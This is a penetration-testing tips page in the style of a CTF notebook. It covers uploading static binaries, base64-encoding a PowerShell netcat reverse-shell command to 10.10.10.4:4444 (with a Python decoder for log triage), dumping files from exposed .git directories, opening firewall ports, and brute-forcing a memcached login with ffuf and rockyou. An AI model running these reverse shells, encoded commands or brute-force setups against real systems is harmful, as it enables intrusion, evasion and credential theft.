Tips
Static binaries
Tools like socat, nmap, ... are rarely installed on target machines, but you can upload a statically linked binary and run it without depending on the target's shared libraries.
List : ag/the_silver_searcher, binutils, file, ht, nano, nmap, p0fv3, pv(PipeViewer), python, socat, strace, tcpdump, yasm.
Link : github.com/andrew-d/static-binaries
Windows UTF16 Little Endian
PowerShell's -EncodedCommand (-e) expects the base64 of the command's UTF-16LE bytes, not UTF-8, so encode it from Linux with iconv before base64:
$ echo -n 'c:\windows\temp\nc.exe 10.10.10.4 4444 -e powershell' | iconv -t utf-16le | base64 -w 0
YwA6AFwAdwBpAG4AZAB...
C:\> powershell -e YwA6AFwAdwBpAG4AZAB...
The same encoding done from PowerShell itself (Unicode is .NET's name for UTF-16LE):
$command = 'c:\windows\temp\nc.exe 10.10.10.4 4444 -e powershell'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
$encodedCommand
Thanks @xThaz
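The same UTF-16LE + base64 encoding in Python, plus the reverse direction that is useful when triaging process-creation logs: pull every -e / -ec / -enc / -EncodedCommand payload out of a command line and decode it. This is an added example, not code from the page or from @xThaz; the log line it parses is constructed here, and the nc.exe command is the one from the page above.

```python
import base64
import re

# Constructed sample: the callback command used on the page.
SAMPLE_COMMAND = r"c:\windows\temp\nc.exe 10.10.10.4 4444 -e powershell"

# "-<flag> <base64blob>"; the flag is validated afterwards.
_FLAG_RE = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]+)")


def encode_ps_command(command: str) -> str:
    """Base64 of the UTF-16LE bytes, i.e. what `powershell -EncodedCommand` expects.
    Same result as: echo -n CMD | iconv -t utf-16le | base64 -w 0"""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps_command(blob: str) -> str:
    """Inverse of encode_ps_command; tolerates '=' padding stripped by log pipelines."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


def _is_encoded_flag(flag: str) -> bool:
    # powershell.exe accepts any prefix of "encodedcommand" starting with "e"
    # (-e, -en, -enc, ...) and the special alias -ec; -ep/-ex* are other switches.
    flag = flag.lower()
    return flag == "ec" or "encodedcommand".startswith(flag)


def extract_encoded_commands(cmdline: str) -> list:
    """Decode every -EncodedCommand payload found in a process command line.
    Values that are not valid base64/UTF-16LE text are skipped, so a stray
    `nc.exe ... -e powershell` does not produce garbage."""
    found = []
    for flag, blob in _FLAG_RE.findall(cmdline):
        if not _is_encoded_flag(flag):
            continue
        try:
            text = decode_ps_command(blob)
        except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            found.append(text)
    return found


if __name__ == "__main__":
    enc = encode_ps_command(SAMPLE_COMMAND)
    print(enc)
    # Constructed log line in the style of a Sysmon/4688 CommandLine field.
    print(extract_encoded_commands(f"powershell.exe -nop -w hidden -ExecutionPolicy Bypass -EncodedCommand {enc}"))
```

Feed it the CommandLine field of Sysmon event 1 or Security event 4688 records; the prefix check is what keeps -ExecutionPolicy from being mistaken for -e.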
Extract files from .git
Using git :
$ ls -al web
total 12
drwxr-xr-x 3 xanhacks xanhacks 4096 Feb 7 14:47 .
drwxr-xr-x 12 xanhacks xanhacks 4096 Feb 7 14:47 ..
drwxr-xr-x 6 xanhacks xanhacks 4096 Feb 7 14:45 .git
$ git --work-tree=$(pwd) checkout HEAD^1 # move to the parent of HEAD first, so that coming back to master rewrites the working tree (git --work-tree=$(pwd) checkout -f master does the same in one step)
HEAD is now at 82dfc97 Initial Commit for the back-end
$ git --work-tree=$(pwd) checkout master # come back to the last commit
Previous HEAD position was 82dfc97 Initial Commit for the back-end
Switched to branch 'master'
$ ls
css favicon.png fonts img index.html js resources
Using GitTools :
$ ls -al web
total 12
drwxr-xr-x 3 xanhacks xanhacks 4096 Feb 7 14:47 .
drwxr-xr-x 12 xanhacks xanhacks 4096 Feb 7 14:47 ..
drwxr-xr-x 6 xanhacks xanhacks 4096 Feb 7 14:45 .git
$ git clone https://github.com/internetwache/GitTools
[...]
$ bash GitTools/Extractor/extractor.sh web/ output/
[...]
[*] Destination folder does not exist
[*] Creating...
[+] Found commit: 70dde80cc19ec76704567996738894828f4ee895
[...]
$ ls output
0-70dde80cc19ec76704567996738894828f4ee895
1-345ac8b236064b431fa43f53d91c98c4834ef8f3
2-82dfc97bec0d7582d485d9031c09abcb5c6b18f2
$ ls output/0-70dde80cc19ec76704567996738894828f4ee895
commit-meta.txt css favicon.png fonts img index.html js
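Both recoveries above rely on the git binary reading the leaked .git directory. As an added example (not code from the page, from git, or from GitTools), here is what the extractor is doing underneath, written against the on-disk format directly: follow HEAD to a commit, walk the first-parent chain, parse each tree and write the blobs out into <n>-<sha>/ directories in the GitTools layout. It only handles loose objects (.git/objects/xx/...), which is what a freshly dumped site repo usually has; a repo whose history was packed into .git/objects/pack needs git or GitTools. The two-commit repository it runs on is constructed inline by build_sample_repo, and the file names and contents in it are made up.

```python
import hashlib
import os
import zlib


def read_object(git_dir, sha):
    """Loose object: zlib('<type> <size>\\0' + payload) at objects/xx/yyyy..."""
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    with open(path, "rb") as f:
        raw = zlib.decompress(f.read())
    header, _, body = raw.partition(b"\0")
    kind, size = header.decode().split()
    if len(body) != int(size):
        raise ValueError("corrupt object " + sha)
    return kind, body


def parse_tree(body):
    """Yield (mode, name, sha) from '<mode> <name>\\0<20 raw sha bytes>' entries."""
    i = 0
    while i < len(body):
        nul = body.index(b"\0", i)
        mode, name = body[i:nul].decode().split(" ", 1)
        yield mode, name, body[nul + 1:nul + 21].hex()
        i = nul + 21


def commit_info(body):
    """(tree_sha, [parent_shas]) from the header lines of a commit object."""
    headers = body.split(b"\n\n", 1)[0].decode().splitlines()
    tree = next(line[5:] for line in headers if line.startswith("tree "))
    parents = [line[7:] for line in headers if line.startswith("parent ")]
    return tree, parents


def resolve_head(git_dir):
    """HEAD is 'ref: refs/heads/x' or, when detached, a bare commit sha."""
    with open(os.path.join(git_dir, "HEAD")) as f:
        head = f.read().strip()
    if head.startswith("ref: "):
        with open(os.path.join(git_dir, head[5:])) as f:
            return f.read().strip()
    return head


def walk_commits(git_dir, sha):
    """First-parent chain from sha back to the root commit, newest first."""
    chain = []
    while sha:
        chain.append(sha)
        _, parents = commit_info(read_object(git_dir, sha)[1])
        sha = parents[0] if parents else None
    return chain


def dump_tree(git_dir, tree_sha, out_dir, prefix=""):
    """Write every blob under tree_sha into out_dir; return sorted relative paths."""
    os.makedirs(out_dir, exist_ok=True)
    written = []
    for mode, name, sha in parse_tree(read_object(git_dir, tree_sha)[1]):
        if mode == "40000":       # subdirectory
            written += dump_tree(git_dir, sha, os.path.join(out_dir, name), prefix + name + "/")
        elif mode == "160000":    # submodule pointer: no blob to write
            continue
        else:                     # 100644/100755 file, 120000 symlink target written as a file
            with open(os.path.join(out_dir, name), "wb") as f:
                f.write(read_object(git_dir, sha)[1])
            written.append(prefix + name)
    return sorted(written)


def extract_all(git_dir, out_dir):
    """GitTools-style output: {'<n>-<sha>': [files...]} for each commit from HEAD."""
    result = {}
    for n, sha in enumerate(walk_commits(git_dir, resolve_head(git_dir))):
        tree, _ = commit_info(read_object(git_dir, sha)[1])
        name = "%d-%s" % (n, sha)
        result[name] = dump_tree(git_dir, tree, os.path.join(out_dir, name))
    return result


def _write_object(git_dir, kind, body):
    """Store a loose object exactly as git does (used only to build the fixture)."""
    raw = b"%s %d\0%s" % (kind.encode(), len(body), body)
    sha = hashlib.sha1(raw).hexdigest()
    d = os.path.join(git_dir, "objects", sha[:2])
    os.makedirs(d, exist_ok=True)
    with open(os.path.join(d, sha[2:]), "wb") as f:
        f.write(zlib.compress(raw))
    return sha


def _entry(mode, name, sha):
    return b"%s %s\0%s" % (mode.encode(), name.encode(), bytes.fromhex(sha))


def build_sample_repo(root):
    """Constructed fixture: a .git with two loose commits and no working tree."""
    git_dir = os.path.join(root, ".git")
    os.makedirs(os.path.join(git_dir, "refs", "heads"))
    who = "x <x@example.invalid> 0 +0000"
    cfg = _write_object(git_dir, "blob", b"<?php\n$db_pass = 'hunter2';\n")
    inc = _write_object(git_dir, "tree", _entry("100644", "config.php", cfg))
    tree1 = _write_object(git_dir, "tree", _entry("40000", "inc", inc))
    c1 = _write_object(git_dir, "commit", ("tree %s\nauthor %s\ncommitter %s\n\nInitial Commit\n" % (tree1, who, who)).encode())
    idx = _write_object(git_dir, "blob", b"<html>hello</html>\n")
    tree2 = _write_object(git_dir, "tree", _entry("40000", "inc", inc) + _entry("100644", "index.html", idx))
    c2 = _write_object(git_dir, "commit", ("tree %s\nparent %s\nauthor %s\ncommitter %s\n\nAdd index\n" % (tree2, c1, who, who)).encode())
    with open(os.path.join(git_dir, "HEAD"), "w") as f:
        f.write("ref: refs/heads/master\n")
    with open(os.path.join(git_dir, "refs", "heads", "master"), "w") as f:
        f.write(c2 + "\n")
    return git_dir


if __name__ == "__main__":
    import tempfile
    root = tempfile.mkdtemp()
    for d, files in extract_all(build_sample_repo(root), os.path.join(root, "output")).items():
        print(d, files)
```

Point extract_all at a real leaked directory with extract_all("web/.git", "output/"); a FileNotFoundError under objects/ means the object is packed or was never downloaded, which is where the git-based methods above take over.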
Add firewall rule
RedHat / CentOS (firewalld)
$ firewall-cmd --zone=public --add-port PORT/tcp # runtime only: the rule is gone after a reload or reboot; add --permanent and then firewall-cmd --reload to keep it
$ firewall-cmd --zone=public --add-port 4444/tcp
Windows (from an elevated prompt)
C:\> netsh advfirewall firewall add rule name="portfwd" dir=in action=allow protocol=tcp localport=20000
Ok.
Bruteforce whatever you want
Any CLI tool that takes a password on its command line can be driven by ffuf: wrap it in a one-file PHP endpoint and fuzz the parameter.
$ cat index.php
<?php
$pass = $_REQUEST['pass'];
// escapeshellarg: rockyou is full of ', $, ; and spaces that would otherwise break (or inject into) the shell command
system("memccat --username toto --password " . escapeshellarg($pass) . " --servers 10.10.10.190");
?>
$ php -S localhost:8000
[Thu Feb 10 18:29:12 2022] PHP 8.1.2 Development Server (http://localhost:8000) started
$ ffuf -u 'http://localhost:8000/?pass=FUZZ' -w /opt/rockyou.txt -fs 40 # -fs 40 hides responses of the size a failed login produces; measure it once with a wrong password first